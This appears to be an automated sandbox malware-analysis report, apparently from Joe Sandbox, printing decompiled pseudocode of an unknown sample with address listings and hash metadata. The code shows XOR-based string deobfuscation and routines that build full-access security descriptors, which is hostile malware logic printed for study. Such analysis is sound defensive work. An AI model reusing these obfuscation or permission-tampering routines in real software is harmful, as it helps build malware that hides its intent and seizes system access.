                                                                    				_v344 = 0x8c;
                                                                    				_t342[0x1c] = 0xa3;
                                                                    				_t342[0x1c] = 0xb5;
                                                                    				_t342[0x1c] = 0xa2;
                                                                    				_v340 = 0xa6;
                                                                    				_t342[0x1d] = 0xfe;
                                                                    				_t342[0x1d] = 0xa7;
                                                                    				_t342[0x1d] = 0xb1;
                                                                    				_t342[0x1e] = 0xa8;
                                                                    				_t342[0x1e] = 0xd0;
                                                                    				_t276 = 0;
                                                                    				do {
                                                                    					if(_t225 >= 0x77) {
                                                                    						_t225 = _t225 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t225 = _t225 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t342 + _t276 + 0x68) =  *(_t342 + _t276 + 0x68) ^ 0x000000d0;
                                                                    					_t276 = _t276 + 1;
                                                                    				} while (_t276 < 0x12);
                                                                    				E0041BA80( &_v328,  &(_t342[0x2c]), 0x104);
                                                                    				E0041AEE0( &_v272);
                                                                    				_t230 = _t342[1] + (0x00000003 - _t342[1] *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_t342[0x10] = 0xf5;
                                                                    				_t342[0x10] = 0x87;
                                                                    				_t342[0x10] = 0x99;
                                                                    				_t342[0x10] = 0x9e;
                                                                    				_t342[0x11] = 0x94;
                                                                    				_t342[0x11] = 0x99;
                                                                    				_t342[0x11] = 0x82;
                                                                    				_t342[0x11] = 0xf5;
                                                                    				_v376 = 0x8c;
                                                                    				_t342[0x12] = 0xa3;
                                                                    				_t342[0x12] = 0xb5;
                                                                    				_t342[0x12] = 0xa2;
                                                                    				_v372 = 0xa6;
                                                                    				_t342[0x13] = 0xfe;
                                                                    				_t342[0x13] = 0xb7;
                                                                    				_t342[0x13] = 0xb6;
                                                                    				_t342[0x14] = 0xa8;
                                                                    				_t342[0x14] = 0xd0;
                                                                    				_t280 = 0;
                                                                    				do {
                                                                    					if(_t230 >= 0x77) {
                                                                    						_t230 = _t230 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t230 = _t230 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t342 + _t280 + 0x40) =  *(_t342 + _t280 + 0x40) ^ 0x000000d0;
                                                                    					_t280 = _t280 + 1;
                                                                    				} while (_t280 < 0x12);
                                                                    				E0041BA80( &(_t342[0x12]),  &(_t342[0x2c]), 0x104);
                                                                    				E0041AEE0( &_v272);
                                                                    				_v349 = 0xbc;
                                                                    				_v348 = 0xbc;
                                                                    				_t236 = _t342[1] + (0x00000003 - _t342[1] *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v364 = 0xf5;
                                                                    				_v363 = 0x87;
                                                                    				_v362 = 0x99;
                                                                    				_v361 = 0x9e;
                                                                    				_v360 = 0x94;
                                                                    				_v359 = 0x99;
                                                                    				_v358 = 0x82;
                                                                    				_v357 = 0xf5;
                                                                    				_v356 = 0x8c;
                                                                    				_v355 = 0xa3;
                                                                    				_v354 = 0xb5;
                                                                    				_v353 = 0xa2;
                                                                    				_v352 = 0xa6;
                                                                    				_v351 = 0xfe;
                                                                    				_v350 = 0xb4;
                                                                    				_v347 = 0xd0;
                                                                    				_t284 = 0;
                                                                    				do {
                                                                    					if(_t236 >= 0x77) {
                                                                    						_t236 = _t236 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t236 = _t236 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t342 + _t284 + 0x54) =  *(_t342 + _t284 + 0x54) ^ 0x000000d0;
                                                                    					_t284 = _t284 + 1;
                                                                    				} while (_t284 < 0x12);
                                                                    				E0041BA80( &_v348,  &(_t342[0x2c]), 0x104);
                                                                    				if(E0041AEE0( &_v272) == 0) {
                                                                    					E0041AF50( &(_t342[0x2d]), _t239, 4);
                                                                    				}
                                                                    				_t241 = _v428 + (0x00000003 - _v428 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_t342[0xc] = 0xf5;
                                                                    				_t342[0xc] = 0x87;
                                                                    				_t342[0xc] = 0x99;
                                                                    				_t342[0xc] = 0x9e;
                                                                    				_t342[0xd] = 0x94;
                                                                    				_t342[0xd] = 0x99;
                                                                    				_t342[0xd] = 0x82;
                                                                    				_t342[0xd] = 0xf5;
                                                                    				_v376 = 0x8c;
                                                                    				_t342[0xe] = 0xa3;
                                                                    				_t342[0xe] = 0xb5;
                                                                    				_t342[0xe] = 0xa2;
                                                                    				_v372 = 0xa6;
                                                                    				_t342[0xf] = 0xfe;
                                                                    				_t342[0xf] = 0xaa;
                                                                    				_t342[0xf] = 0xd0;
                                                                    				_t288 = 0;
                                                                    				do {
                                                                    					if(_t241 >= 0x77) {
                                                                    						_t241 = _t241 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t241 = _t241 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t342 + _t288 + 0x30) =  *(_t342 + _t288 + 0x30) ^ 0x000000d0;
                                                                    					_t288 = _t288 + 1;
                                                                    				} while (_t288 < 0x10);
                                                                    				E0041BA80( &(_t342[0xe]),  &(_t342[0x2c]), 0x104);
                                                                    				E0041AEE0( &_v272);
                                                                    				_t246 = _t342[1] + (0x00000003 - _t342[1] *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v416 = 0xf5;
                                                                    				_v415 = 0x87;
                                                                    				_v414 = 0x99;
                                                                    				_v413 = 0x9e;
                                                                    				_v412 = 0x94;
                                                                    				_v411 = 0x99;
                                                                    				_v410 = 0x82;
                                                                    				_v409 = 0xf5;
                                                                    				_v408 = 0x8c;
                                                                    				_v407 = 0xa3;
                                                                    				_v406 = 0xb5;
                                                                    				_v405 = 0xa2;
                                                                    				_v404 = 0xa6;
                                                                    				_v403 = 0xfe;
                                                                    				_v402 = 0xa3;
                                                                    				_v401 = 0xd0;
                                                                    				_t292 = 0;
                                                                    				do {
                                                                    					if(_t246 >= 0x77) {
                                                                    						_t246 = _t246 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t246 = _t246 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t342 + _t292 + 0x20) =  *(_t342 + _t292 + 0x20) ^ 0x000000d0;
                                                                    					_t292 = _t292 + 1;
                                                                    				} while (_t292 < 0x10);
                                                                    				E0041BA80( &_v400,  &(_t342[0x2c]), 0x104);
                                                                    				E0041AEE0( &_v272);
                                                                    				_t250 = _t342[1];
                                                                    				_t342[4] = 0x99;
                                                                    				_t342[5] = 0x99;
                                                                    				_t251 = _t342[1] + (0x00000003 - _t250 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v432 = 0xf5;
                                                                    				_t342[4] = 0x87;
                                                                    				_t342[4] = 0x9e;
                                                                    				_v428 = 0x94;
                                                                    				_t342[5] = 0x82;
                                                                    				_t342[5] = 0xf5;
                                                                    				_t342[6] = 0x8c;
                                                                    				_t342[6] = 0xa3;
                                                                    				_t342[6] = 0xb5;
                                                                    				_t342[6] = 0xa2;
                                                                    				_v420 = 0xa6;
                                                                    				_v419 = 0xfe;
                                                                    				_v418 = 0xb3;
                                                                    				_v417 = 0xd0;
                                                                    				_t296 = 0;
                                                                    				do {
                                                                    					if(_t251 >= 0x77) {
                                                                    						_t251 = _t251 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t251 = _t251 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t342 + _t296 + 0xc) =  *(_t342 + _t296 + 0xc) ^ 0x000000d0;
                                                                    					_t296 = _t296 + 1;
                                                                    				} while (_t296 < 0x10);
                                                                    				E0041BA80( &_v416,  &(_t342[0x2b]), 0x104);
                                                                    				return E0041AEE0( &_v272);
                                                                    			}













































































































































































                                                                    0x00412800
                                                                    0x00412808
                                                                    0x0041280c
                                                                    0x00412817
                                                                    0x0041281e
                                                                    0x00412825
                                                                    0x0041282c
                                                                    0x00412833
                                                                    0x00412836
                                                                    0x0041283d
                                                                    0x00412844
                                                                    0x0041284b
                                                                    0x0041285d
                                                                    0x00412864
                                                                    0x0041286b
                                                                    0x00412872
                                                                    0x00412889
                                                                    0x0041288b
                                                                    0x00412890
                                                                    0x00412895
                                                                    0x0041289a
                                                                    0x0041289f
                                                                    0x004128a7
                                                                    0x004128af
                                                                    0x004128b7
                                                                    0x004128be
                                                                    0x004128c6
                                                                    0x004128ce
                                                                    0x004128d6
                                                                    0x004128de
                                                                    0x004128e6
                                                                    0x004128ee
                                                                    0x004128f5
                                                                    0x004128fd
                                                                    0x00412905
                                                                    0x0041290d
                                                                    0x00412915
                                                                    0x0041291c
                                                                    0x00412924
                                                                    0x0041292c
                                                                    0x00412934
                                                                    0x0041293c
                                                                    0x00412944
                                                                    0x0041294c
                                                                    0x00412954
                                                                    0x0041295c
                                                                    0x00412963
                                                                    0x0041296b
                                                                    0x00412973
                                                                    0x0041297b
                                                                    0x00412980
                                                                    0x00412983
                                                                    0x0041298a
                                                                    0x00412985
                                                                    0x00412985
                                                                    0x00412985
                                                                    0x0041298d
                                                                    0x00412992
                                                                    0x00412993
                                                                    0x004129b1
                                                                    0x004129cd
                                                                    0x004129d2
                                                                    0x004129d9
                                                                    0x004129d4
                                                                    0x004129d4
                                                                    0x004129d4
                                                                    0x004129df
                                                                    0x004129e4
                                                                    0x004129e4
                                                                    0x004129f8
                                                                    0x004129fd
                                                                    0x00412a02
                                                                    0x00412a07
                                                                    0x00412a0c
                                                                    0x00412a16
                                                                    0x00412a16
                                                                    0x00412a2a
                                                                    0x00412a3b
                                                                    0x00412a5c
                                                                    0x00412a5e
                                                                    0x00412a63
                                                                    0x00412a68
                                                                    0x00412a6c
                                                                    0x00412a71
                                                                    0x00412a76
                                                                    0x00412a7a
                                                                    0x00412a7f
                                                                    0x00412a84
                                                                    0x00412a89
                                                                    0x00412a8e
                                                                    0x00412a93
                                                                    0x00412a98
                                                                    0x00412a9d
                                                                    0x00412aa2
                                                                    0x00412aa7
                                                                    0x00412aac
                                                                    0x00412ab1
                                                                    0x00412ab6
                                                                    0x00412ab8
                                                                    0x00412abb
                                                                    0x00412ac2
                                                                    0x00412abd
                                                                    0x00412abd
                                                                    0x00412abd
                                                                    0x00412ac5
                                                                    0x00412aca
                                                                    0x00412acb
                                                                    0x00412ae2
                                                                    0x00412aef
                                                                    0x00412b0e
                                                                    0x00412b10
                                                                    0x00412b15
                                                                    0x00412b1a
                                                                    0x00412b1e
                                                                    0x00412b23
                                                                    0x00412b28
                                                                    0x00412b2c
                                                                    0x00412b31
                                                                    0x00412b36
                                                                    0x00412b3b
                                                                    0x00412b40
                                                                    0x00412b45
                                                                    0x00412b4a
                                                                    0x00412b4f
                                                                    0x00412b54
                                                                    0x00412b59
                                                                    0x00412b5e
                                                                    0x00412b63
                                                                    0x00412b68
                                                                    0x00412b70
                                                                    0x00412b73
                                                                    0x00412b7a
                                                                    0x00412b75
                                                                    0x00412b75
                                                                    0x00412b75
                                                                    0x00412b7d
                                                                    0x00412b82
                                                                    0x00412b83
                                                                    0x00412b9a
                                                                    0x00412ba7
                                                                    0x00412bae
                                                                    0x00412bb2
                                                                    0x00412bd0
                                                                    0x00412bd2
                                                                    0x00412bd7
                                                                    0x00412bdc
                                                                    0x00412be0
                                                                    0x00412be5
                                                                    0x00412bea
                                                                    0x00412bee
                                                                    0x00412bf3
                                                                    0x00412bf8
                                                                    0x00412bfd
                                                                    0x00412c02
                                                                    0x00412c07
                                                                    0x00412c0c
                                                                    0x00412c11
                                                                    0x00412c16
                                                                    0x00412c1b
                                                                    0x00412c20
                                                                    0x00412c22
                                                                    0x00412c25
                                                                    0x00412c2c
                                                                    0x00412c27
                                                                    0x00412c27
                                                                    0x00412c27
                                                                    0x00412c2f
                                                                    0x00412c34
                                                                    0x00412c35
                                                                    0x00412c4c
                                                                    0x00412c60
                                                                    0x00412c6d
                                                                    0x00412c6d
                                                                    0x00412c8c
                                                                    0x00412c8e
                                                                    0x00412c93
                                                                    0x00412c98
                                                                    0x00412c9c
                                                                    0x00412ca1
                                                                    0x00412ca6
                                                                    0x00412caa
                                                                    0x00412caf
                                                                    0x00412cb4
                                                                    0x00412cb9
                                                                    0x00412cbe
                                                                    0x00412cc3
                                                                    0x00412cc8
                                                                    0x00412ccd
                                                                    0x00412cd2
                                                                    0x00412cd7
                                                                    0x00412cdc
                                                                    0x00412ce0
                                                                    0x00412ce3
                                                                    0x00412cea
                                                                    0x00412ce5
                                                                    0x00412ce5
                                                                    0x00412ce5
                                                                    0x00412ced
                                                                    0x00412cf2
                                                                    0x00412cf3
                                                                    0x00412d0a
                                                                    0x00412d17
                                                                    0x00412d36
                                                                    0x00412d38
                                                                    0x00412d3d
                                                                    0x00412d42
                                                                    0x00412d46
                                                                    0x00412d4b
                                                                    0x00412d50
                                                                    0x00412d54
                                                                    0x00412d59
                                                                    0x00412d5e
                                                                    0x00412d63
                                                                    0x00412d68
                                                                    0x00412d6d
                                                                    0x00412d72
                                                                    0x00412d77
                                                                    0x00412d7c
                                                                    0x00412d81
                                                                    0x00412d86
                                                                    0x00412d88
                                                                    0x00412d8b
                                                                    0x00412d92
                                                                    0x00412d8d
                                                                    0x00412d8d
                                                                    0x00412d8d
                                                                    0x00412d95
                                                                    0x00412d9a
                                                                    0x00412d9b
                                                                    0x00412db2
                                                                    0x00412dbf
                                                                    0x00412dc4
                                                                    0x00412dde
                                                                    0x00412de2
                                                                    0x00412de6
                                                                    0x00412de8
                                                                    0x00412ded
                                                                    0x00412df2
                                                                    0x00412df7
                                                                    0x00412dfc
                                                                    0x00412e01
                                                                    0x00412e06
                                                                    0x00412e0b
                                                                    0x00412e10
                                                                    0x00412e15
                                                                    0x00412e1a
                                                                    0x00412e1f
                                                                    0x00412e24
                                                                    0x00412e29
                                                                    0x00412e2e
                                                                    0x00412e31
                                                                    0x00412e34
                                                                    0x00412e3b
                                                                    0x00412e36
                                                                    0x00412e36
                                                                    0x00412e36
                                                                    0x00412e3e
                                                                    0x00412e43
                                                                    0x00412e44
                                                                    0x00412e5b
                                                                    0x00412e73

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID: e$r$s$v
                                                                    • API String ID: 237503144-1789170556
                                                                    • Opcode ID: f90f3533aa161295c8b59b384008d2c6ec505db068ea650eec36719058a066ad
                                                                    • Instruction ID: 0e046b23adbf5db9fff1240b4a0140187edce39dea73b80ab69e1dadb429bcd6
                                                                    • Opcode Fuzzy Hash: f90f3533aa161295c8b59b384008d2c6ec505db068ea650eec36719058a066ad
                                                                    • Instruction Fuzzy Hash: 0912662115CBC28DC336C63C4985A8FBF815BE7234F584B9EF1F58A2E6D6648106C76B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004215C0() {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t123;
                                                                    				intOrPtr _t125;
                                                                    				signed int _t149;
                                                                    				signed int _t159;
                                                                    				signed int _t169;
                                                                    				intOrPtr _t175;
                                                                    				signed char _t190;
                                                                    				signed char** _t218;
                                                                    				signed int _t228;
                                                                    				signed int _t229;
                                                                    				signed int _t238;
                                                                    				signed int _t239;
                                                                    				signed int _t248;
                                                                    				signed int _t249;
                                                                    				signed char _t256;
                                                                    				intOrPtr _t258;
                                                                    				long _t287;
                                                                    				intOrPtr* _t288;
                                                                    				intOrPtr _t289;
                                                                    				void* _t308;
                                                                    				void* _t309;
                                                                    				void* _t310;
                                                                    				intOrPtr* _t311;
                                                                    				void* _t313;
                                                                    				long _t314;
                                                                    				void* _t325;
                                                                    				void* _t327;
                                                                    				void* _t329;
                                                                    				void* _t331;
                                                                    
                                                                    				_t117 =  *0x44801c; // 0x1e
                                                                    				 *((intOrPtr*)(_t325 + 0x1c)) = 0;
                                                                    				 *((char*)(_t325 + 0x28)) = 0;
                                                                    				 *((char*)(_t325 + 0x29)) = 0;
                                                                    				 *((char*)(_t325 + 0x2a)) = 0;
                                                                    				 *((char*)(_t325 + 0x2b)) = 0;
                                                                    				 *((char*)(_t325 + 0x2c)) = 0;
                                                                    				 *((char*)(_t325 + 0x2d)) = 5;
                                                                    				 *((intOrPtr*)(_t325 + 0x10)) = 0;
                                                                    				 *(_t325 + 0x14) = 0;
                                                                    				 *((intOrPtr*)(_t325 + 0x18)) = 0;
                                                                    				 *((char*)(_t325 + 0xf)) = ((_t117 - ( *(_t325 + 3) & 0x000000ff) - 0x00000076 | 0x0000000c) * 0x43 >> 0x20) + (_t117 - ( *(_t325 + 3) & 0x000000ff) - 0x00000076 | 0x0000000c) * 0x43;
                                                                    				_t306 = E0041AC50();
                                                                    				_t123 = E0041ACD0(_t122, 8, 0x14);
                                                                    				_t217 =  *((intOrPtr*)(_t325 + 0x34));
                                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t325 + 0x34)) + 4)) = _t123;
                                                                    				if(_t123 != 0) {
                                                                    					_t313 = E0041ACD0(_t306, 8, 0x1000);
                                                                    					 *((intOrPtr*)(_t325 + 0x3c)) = _t313;
                                                                    					if(_t313 != 0) {
                                                                    						_t125 = E0041ACD0(_t306, 8, 0x1000);
                                                                    						 *((intOrPtr*)(_t325 + 0x40)) = _t125;
                                                                    						if(_t125 != 0) {
                                                                    							_t218 = E0041ACD0(_t306, 8, 0x1000);
                                                                    							if(_t218 != 0) {
                                                                    								_t287 = E0041ACD0(_t306, 8, 0x44);
                                                                    								if(_t287 != 0) {
                                                                    									_t314 = E0041ACD0(_t306, 8, 0x1000);
                                                                    									if(_t314 != 0) {
                                                                    										_t307 =  *((intOrPtr*)(_t325 + 0x38));
                                                                    										 *((intOrPtr*)(_t325 + 0x1c)) = _t287;
                                                                    										 *((intOrPtr*)(_t325 + 0x20)) = _t287;
                                                                    										 *((intOrPtr*)(_t325 + 0x24)) = _t287;
                                                                    										 *((intOrPtr*)(_t325 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t325 + 0x38)) + 4));
                                                                    										if(E0041CC50( *((intOrPtr*)( *((intOrPtr*)(_t325 + 0x38)) + 4)), 1) == 0 || E0041C9F0(_t287, _t307, E0041AFE0(), 0xf01ff, _t325 + 0x20) == 0) {
                                                                    											goto L10;
                                                                    										} else {
                                                                    											_t288 =  *((intOrPtr*)(_t325 + 0x3c));
                                                                    											if(E0041CD20( *((intOrPtr*)(_t325 + 0x20)), 4, _t288, 0x1000, _t325 + 0x24) == 0 || E0041CD20( *((intOrPtr*)(_t325 + 0x20)), 5,  *((intOrPtr*)(_t325 + 0x40)), 0x1000, _t325 + 0x24) == 0 || E0041CD20( *((intOrPtr*)(_t325 + 0x20)), 6, _t218, 0x1000, _t325 + 0x24) == 0) {
                                                                    												goto L10;
                                                                    											} else {
                                                                    												_t140 =  *_t288;
                                                                    												if( *_t288 == 0 || E0041CDD0( *((intOrPtr*)(_t307 + 4)), _t140, 1) == 0) {
                                                                    													goto L10;
                                                                    												} else {
                                                                    													_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t325 + 0x40))));
                                                                    													if( *((intOrPtr*)( *((intOrPtr*)(_t325 + 0x40)))) == 0) {
                                                                    														goto L10;
                                                                    													} else {
                                                                    														if(E0041CEA0( *((intOrPtr*)(_t307 + 4)), _t143, 1) != 0) {
                                                                    															_t289 =  *0x44801c; // 0xffffba1e
                                                                    															 *0x44801c = _t289 - 0x45e2;
                                                                    															if(AllocateAndInitializeSid(_t325 + 0x54, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t325 + 0x14) == 0 ||  *(_t325 + 0x14) == 0) {
                                                                    																goto L10;
                                                                    															} else {
                                                                    																 *_t314 = 0;
                                                                    																 *((char*)(_t314 + 1)) = 0;
                                                                    																 *((intOrPtr*)(_t314 + 4)) = 0x101fffff;
                                                                    																_t53 = _t314 + 8; // 0x8
                                                                    																 *(_t314 + 2) = 0x10 + ( *( *(_t325 + 0x14) + 1) & 0x000000ff) * 4;
                                                                    																_t149 = E0041D3C0( *(_t325 + 0x14));
                                                                    																_t308 =  *(_t325 + 0x14);
                                                                    																_t228 = _t149;
                                                                    																_t229 = _t228 >> 2;
                                                                    																memcpy(_t53, _t308, _t229 << 2);
                                                                    																memcpy(_t308 + _t229 + _t229, _t308, _t228 & 0x00000003);
                                                                    																_t327 = _t325 + 0x18;
                                                                    																( *_t218)[2] = ( *_t218)[2] +  *(_t314 + 2);
                                                                    																if(E0041CF70( *_t218,  *( *_t218) & 0x000000ff, 0xffffffff, _t314,  *(_t314 + 2) & 0x0000ffff) == 0 || AllocateAndInitializeSid(_t327 + 0x54, 2, 0x20, 0x221, 0, 0, 0, 0, 0, 0, _t327 + 0x18) == 0 ||  *(_t327 + 0x18) == 0) {
                                                                    																	goto L10;
                                                                    																} else {
                                                                    																	 *_t314 = 0;
                                                                    																	 *((char*)(_t314 + 1)) = 0;
                                                                    																	 *((intOrPtr*)(_t314 + 4)) = 0x101fffff;
                                                                    																	 *(_t314 + 2) = 0x10 + ( *( *((intOrPtr*)(_t327 + 0x14)) + 1) & 0x000000ff) * 4;
                                                                    																	_t159 = E0041D3C0( *(_t327 + 0x18));
                                                                    																	_t309 =  *(_t327 + 0x18);
                                                                    																	_t238 = _t159;
                                                                    																	_t239 = _t238 >> 2;
                                                                    																	_t76 = _t314 + 8; // 0x8
                                                                    																	memcpy(_t76, _t309, _t239 << 2);
                                                                    																	memcpy(_t309 + _t239 + _t239, _t309, _t238 & 0x00000003);
                                                                    																	_t329 = _t327 + 0x18;
                                                                    																	( *_t218)[2] = ( *_t218)[2] +  *(_t314 + 2);
                                                                    																	if(E0041CF70( *_t218,  *( *_t218) & 0x000000ff, 0xffffffff, _t314,  *(_t314 + 2) & 0x0000ffff) != 0) {
                                                                    																		if(AllocateAndInitializeSid(_t329 + 0x54, 1, 0x12, 0, 0, 0, 0, 0, 0, 0, _t329 + 0x1c) != 0) {
                                                                    																			if( *(_t329 + 0x1c) == 0) {
                                                                    																				goto L10;
                                                                    																			} else {
                                                                    																				 *_t314 = 0;
                                                                    																				 *((char*)(_t314 + 1)) = 0;
                                                                    																				 *((intOrPtr*)(_t314 + 4)) = 0x101fffff;
                                                                    																				 *(_t314 + 2) = 0x10 + ( *( *((intOrPtr*)(_t329 + 0x14)) + 1) & 0x000000ff) * 4;
                                                                    																				_t169 = E0041D3C0( *(_t329 + 0x1c));
                                                                    																				_t310 =  *(_t329 + 0x1c);
                                                                    																				_t248 = _t169;
                                                                    																				_t249 = _t248 >> 2;
                                                                    																				_t104 = _t314 + 8; // 0x8
                                                                    																				memcpy(_t104, _t310, _t249 << 2);
                                                                    																				memcpy(_t310 + _t249 + _t249, _t310, _t248 & 0x00000003);
                                                                    																				_t331 = _t329 + 0x18;
                                                                    																				( *_t218)[2] = ( *_t218)[2] +  *(_t314 + 2);
                                                                    																				if(E0041CF70( *_t218,  *( *_t218) & 0x000000ff, 0xffffffff, _t314,  *(_t314 + 2) & 0x0000ffff) == 0) {
                                                                    																					goto L10;
                                                                    																				} else {
                                                                    																					_t175 =  *((intOrPtr*)(_t331 + 0x28));
                                                                    																					 *(_t175 + 2) =  *(_t175 + 2) | 0x00000004;
                                                                    																					_t311 =  *((intOrPtr*)(_t331 + 0x38));
                                                                    																					 *(_t175 + 0x10) =  *_t218;
                                                                    																					if(E0041CFE0( *((intOrPtr*)(_t311 + 4))) == 0) {
                                                                    																						goto L10;
                                                                    																					} else {
                                                                    																						 *(_t311 + 8) = 1;
                                                                    																						 *_t311 = 0xc;
                                                                    																						return 1;
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		} else {
                                                                    																			_t256 =  *0x448020; // 0x0
                                                                    																			 *0x448020 = _t256 + (_t256 &  *(_t329 + 0x13) ^ 0x00000017) * 0x47;
                                                                    																			return 0;
                                                                    																		}
                                                                    																	} else {
                                                                    																		_t258 =  *0x44801c; // 0xffffba1e
                                                                    																		 *0x44801c = _t258 + ((( *(_t329 + 0x13) & 0x000000ff) - _t258 + 0x00000019 | 0x0000005d) + (( *(_t329 + 0x13) & 0x000000ff) - _t258 + 0x00000019 | 0x0000005d) * 4) * 2;
                                                                    																		return 0;
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														} else {
                                                                    															_t190 =  *0x448020; // 0x0
                                                                    															if(_t190 >= 0x4e) {
                                                                    																 *0x448020 = _t190 ^ 0x00000022;
                                                                    																return 0;
                                                                    															} else {
                                                                    																 *0x448020 = _t190 ^ 0x0000005f;
                                                                    																return 0;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										E0041AD50(_t306, _t314,  *((intOrPtr*)(_t325 + 0x38)));
                                                                    										E0041AD50(_t306, _t314,  *((intOrPtr*)(_t325 + 0x3c)));
                                                                    										E0041AD50(_t306, _t314,  *((intOrPtr*)(_t325 + 0x40)));
                                                                    										E0041AD50(_t306, _t314, _t218);
                                                                    										E0041AD50(_t306, _t314, _t287);
                                                                    										return 0;
                                                                    									}
                                                                    								} else {
                                                                    									E0041AD50(_t306, _t127,  *((intOrPtr*)(_t325 + 0x38)));
                                                                    									E0041AD50(_t306, _t287, _t313);
                                                                    									E0041AD50(_t306, _t287,  *((intOrPtr*)(_t325 + 0x40)));
                                                                    									E0041AD50(_t306, _t287, _t218);
                                                                    									L10:
                                                                    									return 0;
                                                                    								}
                                                                    							} else {
                                                                    								E0041AD50(_t306, 0,  *((intOrPtr*)(_t325 + 0x38)));
                                                                    								E0041AD50(_t306, 0, _t313);
                                                                    								E0041AD50(_t306, 0,  *((intOrPtr*)(_t325 + 0x40)));
                                                                    								return 0;
                                                                    							}
                                                                    						} else {
                                                                    							E0041AD50(_t306, 0, _t217);
                                                                    							E0041AD50(_t306, 0, _t313);
                                                                    							return 0;
                                                                    						}
                                                                    					} else {
                                                                    						E0041AD50(_t306, 0, _t217);
                                                                    						return 0;
                                                                    					}
                                                                    				} else {
                                                                    					return 0;
                                                                    				}
                                                                    			}



































                                                                    0x004215c7
                                                                    0x004215e0
                                                                    0x004215e4
                                                                    0x004215e9
                                                                    0x004215ee
                                                                    0x004215f3
                                                                    0x004215f8
                                                                    0x004215fd
                                                                    0x00421602
                                                                    0x00421606
                                                                    0x0042160a
                                                                    0x0042160e
                                                                    0x00421619
                                                                    0x0042161e
                                                                    0x00421625
                                                                    0x00421629
                                                                    0x0042162c
                                                                    0x00421647
                                                                    0x0042164b
                                                                    0x0042164f
                                                                    0x0042166d
                                                                    0x00421674
                                                                    0x00421678
                                                                    0x004216a3
                                                                    0x004216a7
                                                                    0x004216df
                                                                    0x004216e3
                                                                    0x00421726
                                                                    0x0042172a
                                                                    0x0042176c
                                                                    0x00421776
                                                                    0x0042177a
                                                                    0x0042177e
                                                                    0x00421782
                                                                    0x0042178d
                                                                    0x00000000
                                                                    0x004217b0
                                                                    0x004217b0
                                                                    0x004217cd
                                                                    0x00000000
                                                                    0x00421815
                                                                    0x00421815
                                                                    0x00421819
                                                                    0x00000000
                                                                    0x00421833
                                                                    0x00421837
                                                                    0x0042183b
                                                                    0x00000000
                                                                    0x00421841
                                                                    0x0042184f
                                                                    0x00421880
                                                                    0x004218ab
                                                                    0x004218b9
                                                                    0x00000000
                                                                    0x004218cb
                                                                    0x004218cb
                                                                    0x004218d8
                                                                    0x004218dc
                                                                    0x004218e3
                                                                    0x004218ed
                                                                    0x004218f6
                                                                    0x004218fb
                                                                    0x004218ff
                                                                    0x00421903
                                                                    0x00421906
                                                                    0x0042190d
                                                                    0x0042190d
                                                                    0x00421915
                                                                    0x0042192f
                                                                    0x00000000
                                                                    0x0042196e
                                                                    0x0042196e
                                                                    0x0042197b
                                                                    0x0042197f
                                                                    0x0042198d
                                                                    0x00421996
                                                                    0x0042199b
                                                                    0x0042199f
                                                                    0x004219a3
                                                                    0x004219a6
                                                                    0x004219a9
                                                                    0x004219b0
                                                                    0x004219b0
                                                                    0x004219b8
                                                                    0x004219d2
                                                                    0x00421a22
                                                                    0x00421a53
                                                                    0x00000000
                                                                    0x00421a59
                                                                    0x00421a59
                                                                    0x00421a66
                                                                    0x00421a6a
                                                                    0x00421a78
                                                                    0x00421a81
                                                                    0x00421a86
                                                                    0x00421a8a
                                                                    0x00421a8e
                                                                    0x00421a91
                                                                    0x00421a94
                                                                    0x00421a9b
                                                                    0x00421a9b
                                                                    0x00421aa3
                                                                    0x00421abd
                                                                    0x00000000
                                                                    0x00421ac3
                                                                    0x00421ac5
                                                                    0x00421ac9
                                                                    0x00421acd
                                                                    0x00421ad1
                                                                    0x00421adf
                                                                    0x00000000
                                                                    0x00421ae5
                                                                    0x00421aec
                                                                    0x00421aef
                                                                    0x00421afa
                                                                    0x00421afa
